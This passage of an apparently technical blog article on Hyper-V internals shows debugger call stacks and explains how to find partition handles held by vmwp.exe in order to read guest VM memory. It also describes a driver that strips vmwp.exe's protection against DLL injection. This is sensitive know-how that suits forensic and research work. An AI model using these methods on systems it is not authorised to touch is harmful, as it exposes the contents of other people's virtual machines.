<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 6pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">0d nt!IofCallDriver</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 6pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">0e nt!IopSynchronousServiceTail</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 6pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">0f nt!IopXxxControlFile</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 6pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">10 nt!NtDeviceIoControlFile</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 6pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">11 nt!KiSystemServiceCopyEnd</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 6pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">12 ntdll!NtDeviceIoControlFile</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 6pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">13 vid_7ffb4de20000!VidCreateMemoryBlockGpaRange</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 6pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">14 vmwp!GpaRangeMbBacked::Initialize</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 6pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">15 vmwp!MemoryManager::CreateGpaRangeInternal</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 6pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">16 vmwp!MemoryManager::CreateMemoryBlock</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 6pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">17 vmwp!MemoryManager::CreateRamMemoryBlocks</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 6pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">18 </span><span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 6pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">vmwp!MemoryManager::CreateRam</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 6pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">19 vmwp!VirtualMachine::ConstructGuestRam</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 6pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">1a vmwp!WorkerTaskStarting::RunCleanStartSteps</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 6pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">1b vmwp!WorkerTaskStarting::RunTask</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 6pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">1c vmwp!WorkerAsyncTask<VmPerf::Vmwp::StartingTask>::Execute</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 6pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">1d vmwp!VirtualMachine::DoStateChangeTask</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 6pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">1e vmwp!VirtualMachine::StartInternal</span></div>
</td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; overflow-wrap: break-word; overflow: hidden; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 6pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"># Call Site</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 6pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">00 winhvr!WinHvMapGpaPagesFromMbpArrayScanLargePages</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 6pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">01 Vid!VsmmHvpMapGpasFromMbpArray</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 6pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">02 Vid!VsmmHvpMapGpasFromMemoryBlockRange</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 6pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">03 Vid!VsmmHvMapGpasFromMemoryBlock</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 6pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">04 Vid!VsmmAdjustGpaSpaceForMemoryBlockRange</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 6pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">05 Vid!VsmmCreateMemoryBlockGpaRange</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 6pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">06 Vid!VidIoControlPartition</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 6pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">07 Vid!VidIoControlDispatch</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 6pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">08 Vid!VidIoControlPreProcess</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 6pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">.............WDF Calls............</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 6pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">0d nt!IofCallDriver</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 6pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">0e nt!IopSynchronousServiceTail</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 6pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">0f nt!IopXxxControlFile</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 6pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">10 nt!NtDeviceIoControlFile</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 6pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">11 nt!KiSystemServiceCopyEnd</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 6pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">12 ntdll!NtDeviceIoControlFile</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 6pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">13 vid_7ffb4de20000!VidCreateMemoryBlockGpaRange</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 6pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">14 vmwp!MemoryManager::CreateMemoryBlockGpaRange</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 6pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">15 vmwp!VmbComGpaRange::VmbComGpaRange</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 6pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">16 vmwp!Vml::VmComMultiInstanceObject<VmbComGpaRange>::CreateInstance</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 6pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">17 vmwp!Vml::CreateComObject<VmbComGpaRange,IMemoryManager</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 6pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">18 vmwp!VmbComMemoryBlock::CreateGpaRange</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 6pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">19 </span><span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 6pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">vmuidevices!VideoSynthDevice::SetupVramGpaRange</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 6pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">1a vmuidevices!VideoSynthDevice::SynthVidOnVramLocation</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 6pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">1b vmuidevices!VideoSynthDevice::OnMessageReceived</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 6pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">1c vmuidevices!VMBusPipeIO::OnReadCompletion</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 6pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">1d vmuidevices!VMBusPipeIO::ProcessCompletionList</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 6pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">1e vmuidevices!VMBusPipeIO::HandleCompletions</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 6pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">1f vmuidevices!VMBusPipeIO::OnCompletion</span></div>
</td></tr>
</tbody></table>
</div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.45pt;">
<span style="background-color: white; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">The last memory block is mapped memory of video adapter. A one-page-size block is used for an ACPI devices.</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<div style="text-align: center;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span style="border: none; display: inline-block; height: 403px; overflow: hidden; width: 438px;"><img height="403" src="https://lh5.googleusercontent.com/8EApoTbrFapcwiJK69PXIodyC7b052AxNNoF7UgataavrHcP33O__j-nIPiN3aMzq9a2M-i7Wd15__m4zNylWyB5viw8SdwR5LcQPtQIhnkIjFfay1v5BVIFo-2jbF4QhN4aBO4" style="margin-left: 0px; margin-top: 0px;" width="438" /></span></span></div>
</div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Among other things driver hvmm.sys is needed to remove vmwp.exe protection, that prevent dll injection to that process. That driver works with partition handle with Prtn-signature (VM_PROCESS_CONTEXT), but there is second type, that supporting by vid.sys - EXO-partitions. EXO-partitions can be created using WinHv Platform API Library (https://docs.microsoft.com/en-us/virtualization/api/hypervisor-platform/hypervisor-platform), which allows third-party developers to make their virtualization solutions compatible with Hyper-V and run it simultaneously with native Hyper-V VMs. Currently VirtualBox, Qemu, Bochs (f.e. in applepie implementation) have this supporting. VMware, one year after the appearance of these APIs in Windows 1803, finally added support to its VMware Workstation product too. Probably, a new assembly of VMware will be released after the release of Windows 10, build 1909 (19H2).</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">However, it is still possible to use the vid.dll interface without a driver in Windows Server 2016 and earlier. API execution lock is missing in vid.sys in that OS, and driver hvmm.sys is not needed in that environment. But WDAG and Windows Sandbox containers are presenting in Windows 10 only, where API is locked. </span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">What structures will be needed to work with Guest OS memory? I tried to visualize them in a diagram. In the future, while reading the article, it should become clearly, how they are using.</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span style="border: none; display: inline-block; height: 285px; overflow: hidden; width: 507px;"><img height="224" src="https://lh6.googleusercontent.com/5DLjWoxUr4weG4Z3I7wltzr44kyvMAwnoiUZB9I52tT-Mkc466Z8P3_AJGlINMVdVxhDdKeIZC3I0rE01LeLcn7V27Zto3t1KKN5zKF0jn9NaZp5Tn09KYPVpvAcCKcT1ltANuQ" style="margin-left: 0px; margin-top: 0px;" width="400" /></span></span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Objects:</span></div>
<ul style="margin-bottom: 0; margin-top: 0;">
<li dir="ltr" style="background-color: transparent; color: black; font-family: Calibri,sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: disc; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Partition handle (VM_PROCESS_CONTEXT);</span></div>
</li>
<li dir="ltr" style="background-color: transparent; color: black; font-family: Calibri,sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: disc; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">GPAR-handle (GPAR - Guest physical Address Range);</span></div>
</li>
<li dir="ltr" style="background-color: transparent; color: black; font-family: Calibri,sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: disc; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Array of GPAR elements (GPAR Array);</span></div>
</li>
<li dir="ltr" style="background-color: transparent; color: black; font-family: Calibri,sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: disc; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Array of MBlock-objects (MBlock Array. MBlock – memory block GPA range);</span></div>
</li>
<li dir="ltr" style="background-color: transparent; color: black; font-family: Calibri,sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: disc; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">GPAR-object (GPAR_OBJECT);</span></div>
</li>
<li dir="ltr" style="background-color: transparent; color: black; font-family: Calibri,sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: disc; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">MBlock-object (MEMORY_BLOCK).</span></div>
</li>
</ul>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 18pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Partition handle is the main object, which is used by hvmm driver. When user mode section of partition handle is created, its kernel mode part contains all the necessary information about the created partition. The search algorithm for the user mode component hasn’t changed since Windows Server 2008 R2, and this component can be obtained by enumeration of handles, opened by the vmwp.exe process. For this, find all open file descriptors with the names like \Device\000000 and try to get partition name.</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span style="border: none; display: inline-block; height: 74px; overflow: hidden; width: 430px;"><img height="74" src="https://lh6.googleusercontent.com/gEDbTlblD1ZFiunauCUfBkX4iGqsO5TIoeistR4wvJKPWqafk_3P490XGF7gFeLI39TeuqKYllMU0SoVqZ0eAkN73FxpK1dv6kpWoS5ZpDvIUlmwPFe9uG2kg82XcXbMaA_xpPI" style="margin-left: 0px; margin-top: 0px;" width="430" /></span></span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">If the name can be obtained, it means, that we found a valid partition handle. In my practice, there are 3 similar objects for each Full VM or container. If we pass the obtained values to the kernel function nt!ObReferenceObjectByHandle, then in two cases it returns NULL, that means objects are invalid. For the current descriptor, we get the pointer to the partition handle.</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Yes, object pointers offsets inside partition handle are fixed and differ for each version of Windows. But for same version of Windows they aren’t changed, so the method is quite reliable.</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Partition handle contains fields, that point to an array of MBlock objects (initialized in </span><span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><br /></span><span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">vid.sys!VsmmMemoryBlockpInitialize) and an array of GPAR objects (initialized in vid.sys!VsmmGpaRangepInitialize).</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">By the way, you do not need to confuse the partition handle with the Windows 10 memory partition structure, which !partition WinDBG command displays. This is the _MI_PARTITION structure, which contains basic information about current state of the operating system memory. This object is created without an active hypervisor (or active – no matter).</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span style="border: none; display: inline-block; height: 260px; overflow: hidden; width: 280px;"><img height="260" src="https://lh6.googleusercontent.com/06_S6Yw4ZjqSH_wC6IQ4EqvS13-u_BTj5RwTp5xDuifVyP2pwfHebrQDyHmSYHKbP3NWNf0RI5hpYLPSDqCc1XPfUOkXkJUI6xWnlvudmSwS63txNUeUuCse8TWKrQKfREl7LoU" style="margin-left: 0px; margin-top: 0px;" width="280" /></span></span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">You can read more about it in the 1</span><span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span style="font-size: 0.6em; vertical-align: super;">st</span></span><span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> part of Windows Internals book (7th edition). I couldn’t find that information in MSDN (current Microsoft Docs).</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Containers and Full VM have different accessing memory methods, so let's look at memory reading examples for both. Let's start with Full VM based on Windows Server 2019.</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: center; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Full VM memory reading</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
